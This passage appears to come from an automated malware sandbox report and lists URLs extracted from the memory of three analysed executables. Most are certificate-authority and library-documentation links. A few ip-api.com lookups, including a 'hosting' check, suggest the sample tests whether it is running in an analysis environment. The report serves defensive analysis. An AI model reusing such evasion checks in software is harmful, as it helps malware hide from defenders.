00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Digi
                                  Source: hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: based.exe, 00000006.00000003.1726048221.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752876018.00000273ED015000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1749896560.00000273ED01B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1745966741.00000273ED02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                                  Source: based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                  Source: based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://json.org
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736420193.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736836575.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726792285.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727350063.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1728583386.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726405149.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1736559335.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726220774.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1735413728.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726048221.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                  Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                  Source: based.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
